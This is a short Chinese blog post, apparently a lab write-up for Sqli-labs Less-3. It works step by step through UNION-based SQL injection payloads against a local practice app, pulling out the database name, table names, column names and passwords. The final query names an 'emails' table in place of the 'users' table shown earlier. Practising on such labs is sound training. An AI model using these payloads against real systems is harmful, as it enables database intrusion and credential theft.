Sqli-labs 3

hacker_17Z2024-07-11 23:44

1.按照路径http://localhost/sqli-labs/sqli-labs-master/Less-3/进入

2.判断注入类型----字符型

Payload:?id=1') and 1=1--+

注:根据报错提示的语法错误,在第一行中使用接近'union select 1,2,3--')的正确语法

3.判断注入点:2,3

Payload:id=-1') union select 1,2,3 --+

4. 根据注入点查询指定数据库名----security

Payload:id=-1') union select 1,database(),3 --+

5.查询指定数据库名下的表名

Payload:

id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

6.查询指定表----users下的字段名

Payload:

id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

7.查询指定字段名:password

Payload:

id=-1') union select 1,password,3 from emails--+

相关推荐
Faith_xzc几秒前
【Apache Doris】周FAQ集锦:第 29 期
大数据·数据库·开源·apache·数据库开发·doris
好记性+烂笔头28 分钟前
6Hive Sql 大全
hive·sql
十六ᵛᵃᵉ1 小时前
day06_Spark SQL
大数据·sql·spark
Fallen_ Chang'an2 小时前
Gateway 网关
java·数据库·gateway
程序员阿斌2 小时前
Springboot内置Apache Tomcat 安全漏洞(CVE-2024-50379)
java·spring boot·web安全·tomcat·apache
dengjiayue2 小时前
MySQL 与 Redis 的数据一致性问题
数据库·redis·mysql
ChangYan.3 小时前
Windows的Redis查看自己设置的密码并更改设置密码
数据库·redis·缓存
前鼻音太阳熊4 小时前
【Spring Boot 应用开发】-04-01 自动配置-数据源-连接池
数据库·spring boot
好记性+烂笔头4 小时前
6Hive Sql 大全-Hive 函数
数据库·hive·sql
莫叫石榴姐4 小时前
数仓建模:如何设计可扩展性较好的同环比计算模型?
大数据·数据库·sql·数据分析
热门推荐
01Dell服务器升级ubuntu 22.04失败解决02ESP-IDF学习记录(4) ESP-IDF examples目录03半导体应用系统一些小知识收集(strip&wafer mapping,EAP&scada)04(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明05密码学原理技术-第六章-introduction to pulibc-key cryptography06优化手机性能,解决卡顿问题:关闭这3个微信开关,释放内存空间07go下载依赖提示连接失败08华为HarmonyOS帮助应用实现在线认证服务 -- 2 FIDO免密身份认证09HCIA-datacom数通题库和录播视频资料10[Docker]使用Docker部署常见的中间件